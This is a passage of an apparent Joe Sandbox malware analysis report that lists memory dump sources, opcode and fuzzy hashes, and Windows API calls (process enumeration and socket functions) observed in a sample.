                                                  • Source File: 00000000.00000002.2633453003.0000000007290000.00000040.00001000.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7290000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9c0fc05670ad34587a76d8edccd4874998f5e8ceced3dc19ae4517a4d4060086
                                                  • Instruction ID: 8b73880ad6c3aac65fc44e3d9543d89e099088e3492c3bdd1d0163b49b8d622a
                                                  • Opcode Fuzzy Hash: 9c0fc05670ad34587a76d8edccd4874998f5e8ceced3dc19ae4517a4d4060086
                                                  • Instruction Fuzzy Hash: 8541E4E757C12BBE697250851B24AF66A2EF6D7730F388036B807DA642E2D40E591071
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2633453003.0000000007290000.00000040.00001000.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7290000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: efdedbf7ec19d3d598758331e1fb5fa0db0a5008484189e8831f4f64b434777f
                                                  • Instruction ID: 39c0f97208894fae7a38ba80936ad0605cad316097974ce333c036c95e40ed46
                                                  • Opcode Fuzzy Hash: efdedbf7ec19d3d598758331e1fb5fa0db0a5008484189e8831f4f64b434777f
                                                  • Instruction Fuzzy Hash: 7F4129E757C12BBE697250851B54AF76A2FF6D7730F388036B807DA642E3D80E491071
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2633453003.0000000007290000.00000040.00001000.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7290000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 14a8ddb5d3b8feed98e53e11f761ee41a89dc41bbabd86276a64d7d954d75b79
                                                  • Instruction ID: b5b44f140bf8c07020e1d2ade25a89917d1c2ee4722236fb2629437dead0b796
                                                  • Opcode Fuzzy Hash: 14a8ddb5d3b8feed98e53e11f761ee41a89dc41bbabd86276a64d7d954d75b79
                                                  • Instruction Fuzzy Hash: 5A4115E757C12BBEA97340811B646F66B2FF6D7730F388036B807EA642E2D80A494071
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2633453003.0000000007290000.00000040.00001000.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7290000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: cace263a8b9854faf226cc61fb67ece5710e7940210e9f5ccc554377608c20c6
                                                  • Instruction ID: 344a9030fd5f1b182527b831372629ab2942099bc33a61608162b127626685d6
                                                  • Opcode Fuzzy Hash: cace263a8b9854faf226cc61fb67ece5710e7940210e9f5ccc554377608c20c6
                                                  • Instruction Fuzzy Hash: 494116E757C12BBFA97240811B646FA6A2EF6D3730F388036B807DB642E3D80A595071
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2633453003.0000000007290000.00000040.00001000.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7290000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2633453003.0000000007290000.00000040.00001000.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7290000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  APIs
                                                  • Process32FirstW.KERNEL32(072902AE,072902AE,?,0000006D), ref: 07290479
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2633453003.0000000007290000.00000040.00001000.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7290000_file.jbxd
                                                  Similarity
                                                  • API ID: FirstProcess32
                                                  • String ID:
                                                  • API String ID: 2623510744-0
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2633453003.0000000007290000.00000040.00001000.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7290000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2633453003.0000000007290000.00000040.00001000.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7290000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2633453003.0000000007290000.00000040.00001000.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7290000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  APIs
                                                  • Process32FirstW.KERNEL32(072902AE,072902AE,?,0000006D), ref: 07290479
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2633453003.0000000007290000.00000040.00001000.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7290000_file.jbxd
                                                  Similarity
                                                  • API ID: FirstProcess32
                                                  • String ID:
                                                  • API String ID: 2623510744-0
                                                  APIs
                                                  • Process32FirstW.KERNEL32(072902AE,072902AE,?,0000006D), ref: 07290479
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2633453003.0000000007290000.00000040.00001000.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7290000_file.jbxd
                                                  Similarity
                                                  • API ID: FirstProcess32
                                                  • String ID:
                                                  • API String ID: 2623510744-0
                                                  APIs
                                                  • Process32FirstW.KERNEL32(072902AE,072902AE,?,0000006D), ref: 07290479
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2633453003.0000000007290000.00000040.00001000.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7290000_file.jbxd
                                                  Similarity
                                                  • API ID: FirstProcess32
                                                  • String ID:
                                                  • API String ID: 2623510744-0
                                                  APIs
                                                  • gethostname.WS2_32(00000000,00000040), ref: 005E4AA5
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2630715713.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                                  Similarity
                                                  • API ID: gethostname
                                                  • String ID:
                                                  • API String ID: 144339138-0
                                                  APIs
                                                  • Process32FirstW.KERNEL32(072902AE,072902AE,?,0000006D), ref: 07290479
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2633453003.0000000007290000.00000040.00001000.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7290000_file.jbxd
                                                  Similarity
                                                  • API ID: FirstProcess32
                                                  • String ID:
                                                  • API String ID: 2623510744-0
                                                  APIs
                                                  • Process32FirstW.KERNEL32(072902AE,072902AE,?,0000006D), ref: 07290479
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2633453003.0000000007290000.00000040.00001000.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7290000_file.jbxd
                                                  Similarity
                                                  • API ID: FirstProcess32
                                                  • String ID:
                                                  • API String ID: 2623510744-0
                                                  APIs
                                                  • Process32FirstW.KERNEL32(072902AE,072902AE,?,0000006D), ref: 07290479
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2633453003.0000000007290000.00000040.00001000.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7290000_file.jbxd
                                                  Similarity
                                                  • API ID: FirstProcess32
                                                  • String ID:
                                                  • API String ID: 2623510744-0
                                                  APIs
                                                  • Process32FirstW.KERNEL32(072902AE,072902AE,?,0000006D), ref: 07290479
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2633453003.0000000007290000.00000040.00001000.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7290000_file.jbxd
                                                  Similarity
                                                  • API ID: FirstProcess32
                                                  • String ID:
                                                  • API String ID: 2623510744-0
                                                  APIs
                                                  • Process32FirstW.KERNEL32(072902AE,072902AE,?,0000006D), ref: 07290479
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2633453003.0000000007290000.00000040.00001000.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7290000_file.jbxd
                                                  Similarity
                                                  • API ID: FirstProcess32
                                                  • String ID:
                                                  • API String ID: 2623510744-0
                                                  APIs
                                                  • Process32FirstW.KERNEL32(072902AE,072902AE,?,0000006D), ref: 07290479
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2633453003.0000000007290000.00000040.00001000.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7290000_file.jbxd
                                                  Similarity
                                                  • API ID: FirstProcess32
                                                  • String ID:
                                                  • API String ID: 2623510744-0
                                                  APIs
                                                  • Process32FirstW.KERNEL32(072902AE,072902AE,?,0000006D), ref: 07290479
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2633453003.0000000007290000.00000040.00001000.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7290000_file.jbxd
                                                  Similarity
                                                  • API ID: FirstProcess32
                                                  • String ID:
                                                  • API String ID: 2623510744-0
                                                  APIs
                                                  • Process32FirstW.KERNEL32(072902AE,072902AE,?,0000006D), ref: 07290479
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2633453003.0000000007290000.00000040.00001000.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7290000_file.jbxd
                                                  Similarity
                                                  • API ID: FirstProcess32
                                                  • String ID:
                                                  • API String ID: 2623510744-0
                                                  APIs
                                                  • Process32FirstW.KERNEL32(072902AE,072902AE,?,0000006D), ref: 07290479
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2633453003.0000000007290000.00000040.00001000.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7290000_file.jbxd
                                                  Similarity
                                                  • API ID: FirstProcess32
                                                  • String ID:
                                                  • API String ID: 2623510744-0
                                                  APIs
                                                  • getsockname.WS2_32(?,?,00000080), ref: 005FAFD1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2630715713.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                                  Similarity
                                                  • API ID: getsockname
                                                  • String ID:
                                                  • API String ID: 3358416759-0
                                                  APIs
                                                  • send.WS2_32(?,?,?,00000000,00000000,?), ref: 005FA97E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2630715713.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                                   • Associated: 00000000.00000002.2630696161.0000000000530000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2630715713.0000000000A70000.00000040.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2630715713.0000000000BB4000.00000040.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2630715713.0000000000BD5000.00000040.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2630715713.0000000000BD7000.00000040.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2631171913.0000000000BDA000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2631190257.0000000000BDC000.00000040.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2631190257.0000000000D63000.00000040.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2631190257.0000000000E7F000.00000040.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2631190257.0000000000E84000.00000040.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2631190257.0000000000F5C000.00000040.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2631190257.0000000000F63000.00000040.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2631190257.0000000000F72000.00000040.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2631484798.0000000000F73000.00000080.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2631607205.0000000001132000.00000040.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2631624604.0000000001134000.00000080.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                                  Similarity
                                                  • API ID: send
                                                  • String ID:
                                                  • API String ID: 2809346765-0
                                                  • Opcode ID: a0419478db9738e9b329d82c0eae938e531763846a96094ab152d20d11dfcef0
                                                  • Instruction ID: 7f793a8ce283ee7e00f90e0f71417dd4818ffb333339e1b98802e9266228af2d
                                                  • Opcode Fuzzy Hash: a0419478db9738e9b329d82c0eae938e531763846a96094ab152d20d11dfcef0
                                                  • Instruction Fuzzy Hash: 4F01A7B57117149FC6148F14DC45B56BBA5FFC4720F068569EA981B361C331AC108BD2
                                                  APIs
                                                  • socket.WS2_32(?,005FB280,00000000,-00000001,00000000,005FB280,?,?,00000002,00000011,?,?,00000000,0000000B,?,?), ref: 005FAF67
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2630715713.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                                   • Associated: 00000000.00000002.2630696161.0000000000530000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2630715713.0000000000A70000.00000040.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2630715713.0000000000BB4000.00000040.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2630715713.0000000000BD5000.00000040.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2630715713.0000000000BD7000.00000040.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2631171913.0000000000BDA000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2631190257.0000000000BDC000.00000040.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2631190257.0000000000D63000.00000040.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2631190257.0000000000E7F000.00000040.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2631190257.0000000000E84000.00000040.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2631190257.0000000000F5C000.00000040.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2631190257.0000000000F63000.00000040.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2631190257.0000000000F72000.00000040.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2631484798.0000000000F73000.00000080.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2631607205.0000000001132000.00000040.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2631624604.0000000001134000.00000080.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                                  Similarity
                                                  • API ID: socket
                                                  • String ID:
                                                  • API String ID: 98920635-0
                                                  • Opcode ID: 8595a100e1d632a803b42a486da3a4599884a5c676d1bdd4c88c0edef7e71c6a
                                                  • Instruction ID: cc04080563156a47062160627a749a1e8b5754728264e247b76b0a2e33a41eca
                                                  • Opcode Fuzzy Hash: 8595a100e1d632a803b42a486da3a4599884a5c676d1bdd4c88c0edef7e71c6a
                                                  • Instruction Fuzzy Hash: 13E0EDB6A093216BD654DB18F8449ABF769EFC4B20F055A49B95467304C330AC548BE2
                                                  APIs
                                                  • closesocket.WS2_32(?,005F9422,?,?,?,?,?,?,?,?,?,?,?,w3^,009BCE00,00000000), ref: 005FB04D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2630715713.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                                   • Associated: 00000000.00000002.2630696161.0000000000530000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2630715713.0000000000A70000.00000040.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2630715713.0000000000BB4000.00000040.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2630715713.0000000000BD5000.00000040.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2630715713.0000000000BD7000.00000040.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2631171913.0000000000BDA000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2631190257.0000000000BDC000.00000040.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2631190257.0000000000D63000.00000040.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2631190257.0000000000E7F000.00000040.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2631190257.0000000000E84000.00000040.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2631190257.0000000000F5C000.00000040.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2631190257.0000000000F63000.00000040.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2631190257.0000000000F72000.00000040.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2631484798.0000000000F73000.00000080.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2631607205.0000000001132000.00000040.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2631624604.0000000001134000.00000080.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                                  Similarity
                                                  • API ID: closesocket
                                                  • String ID:
                                                  • API String ID: 2781271927-0
                                                  • Opcode ID: a89527b7bf251c1b5fe84c76a07bf0985239bcf3ca9518feddeae530bd77a074
                                                  • Instruction ID: 1d9f2fc9d785b8d37f0551b5a9d71fec77103d9f695733634c5c1c8fa6e864ef
                                                  • Opcode Fuzzy Hash: a89527b7bf251c1b5fe84c76a07bf0985239bcf3ca9518feddeae530bd77a074
                                                  • Instruction Fuzzy Hash: 7BD0C238300202D7DA209A14C8C8A677A2F7FD1710FA9CB68E12C4A164CB3FCC43C602
                                                  APIs
                                                  • ioctlsocket.WS2_32(?,8004667E,?,?,0056AF56,?,00000001), ref: 005967FB
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2630715713.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                                   • Associated: 00000000.00000002.2630696161.0000000000530000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2630715713.0000000000A70000.00000040.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2630715713.0000000000BB4000.00000040.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2630715713.0000000000BD5000.00000040.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2630715713.0000000000BD7000.00000040.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2631171913.0000000000BDA000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2631190257.0000000000BDC000.00000040.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2631190257.0000000000D63000.00000040.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2631190257.0000000000E7F000.00000040.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2631190257.0000000000E84000.00000040.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2631190257.0000000000F5C000.00000040.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2631190257.0000000000F63000.00000040.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2631190257.0000000000F72000.00000040.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2631484798.0000000000F73000.00000080.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2631607205.0000000001132000.00000040.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2631624604.0000000001134000.00000080.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                                  Similarity
                                                  • API ID: ioctlsocket
                                                  • String ID:
                                                  • API String ID: 3577187118-0
                                                  • Opcode ID: 18e70bf2d9553d036f4478a0d2cd915337566daa7e3960ebb93a5e03882792e6
                                                  • Instruction ID: 5e253e6f4d17d3cce8d5f90fa08ae5605b364ea2c1047a18a1663653463cc68a
                                                  • Opcode Fuzzy Hash: 18e70bf2d9553d036f4478a0d2cd915337566daa7e3960ebb93a5e03882792e6
                                                  • Instruction Fuzzy Hash: 3FC012F1119200AFC60C4724D955A2EB6D8DB44255F12591CB04692190EA349450CA1A
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2630715713.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                                   • Associated: 00000000.00000002.2630696161.0000000000530000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2630715713.0000000000A70000.00000040.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2630715713.0000000000BB4000.00000040.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2630715713.0000000000BD5000.00000040.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2630715713.0000000000BD7000.00000040.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2631171913.0000000000BDA000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2631190257.0000000000BDC000.00000040.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2631190257.0000000000D63000.00000040.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2631190257.0000000000E7F000.00000040.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2631190257.0000000000E84000.00000040.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2631190257.0000000000F5C000.00000040.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2631190257.0000000000F63000.00000040.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2631190257.0000000000F72000.00000040.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2631484798.0000000000F73000.00000080.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2631607205.0000000001132000.00000040.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2631624604.0000000001134000.00000080.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                                  Similarity
                                                  • API ID: CloseHandle
                                                  • String ID:
                                                  • API String ID: 2962429428-0
                                                  • Opcode ID: c0c447457f4215a8599fc0f193fd6194f226b4f29d7ad576ca0b4967f2bc4a9c
                                                  • Instruction ID: 8bc05103895e02766b0f465f42adb0679221efb77c664289b63ec5f4f158a0e5
                                                  • Opcode Fuzzy Hash: c0c447457f4215a8599fc0f193fd6194f226b4f29d7ad576ca0b4967f2bc4a9c
                                                  • Instruction Fuzzy Hash: A53192B49097159BCB00EFB8CA8569EBBF4BF44354F00886DE898E7341EB349A44CF52
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2630715713.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                                   • Associated: 00000000.00000002.2630696161.0000000000530000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2630715713.0000000000A70000.00000040.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2630715713.0000000000BB4000.00000040.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2630715713.0000000000BD5000.00000040.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2630715713.0000000000BD7000.00000040.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2631171913.0000000000BDA000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2631190257.0000000000BDC000.00000040.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2631190257.0000000000D63000.00000040.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2631190257.0000000000E7F000.00000040.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2631190257.0000000000E84000.00000040.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2631190257.0000000000F5C000.00000040.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2631190257.0000000000F63000.00000040.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2631190257.0000000000F72000.00000040.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2631484798.0000000000F73000.00000080.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2631607205.0000000001132000.00000040.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2631624604.0000000001134000.00000080.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                                  Similarity
                                                  • API ID: Sleep
                                                  • String ID:
                                                  • API String ID: 3472027048-0
                                                  • Opcode ID: 0d29268d505926d4a74bee1b5aa855540b2933c20c0474cb3d2f9b259fb21cbf
                                                  • Instruction ID: 3690397ae2ad20032031177c1d652c837c73163532044034cd6c749187bdc2e8
                                                  • Opcode Fuzzy Hash: 0d29268d505926d4a74bee1b5aa855540b2933c20c0474cb3d2f9b259fb21cbf
                                                  • Instruction Fuzzy Hash: B3C08CE0C1030082C701BB3C814610E79E07740208FC00EA8D88492181F228D3188253
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2633537384.00000000072E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_72e0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3aacab809e62b5f6da4a2b4fab5fb61ed6cbd2cd37a4648d78f41568c3068530
                                                  • Instruction ID: 773cc6386effb24daf24c90cc92f2e1e141b78c4eec72c1851bd61b2675021c3
                                                  • Opcode Fuzzy Hash: 3aacab809e62b5f6da4a2b4fab5fb61ed6cbd2cd37a4648d78f41568c3068530
                                                  • Instruction Fuzzy Hash: 0B11A0EB1BC210BCE52280869B14BFA6A6EE3D3730FB19026F843DD586F2D44A4B1070
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2633537384.00000000072E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_72e0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9a7e8d76d2d1b3b5c596877804326cc9faaf7640d3bfcea749dff52f38d3d590
                                                  • Instruction ID: d4a945f828f4fd832c9699703da4d35949a1b4d5d924e6075f208546d0a537a7
                                                  • Opcode Fuzzy Hash: 9a7e8d76d2d1b3b5c596877804326cc9faaf7640d3bfcea749dff52f38d3d590
                                                  • Instruction Fuzzy Hash: 5811A1EB17C114BCE52684829B14BFA666EE3D3330FB19066F843DD586F6D54A4F1035
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2633537384.00000000072E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_72e0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8f2fbfa539fcec0490cdf941720b1a986c0e1f5acbe7873bcb051c4a73b25357
                                                  • Instruction ID: 1317de73a46b517a698d8a109977e71e872131291a67754175941b4a659cf827
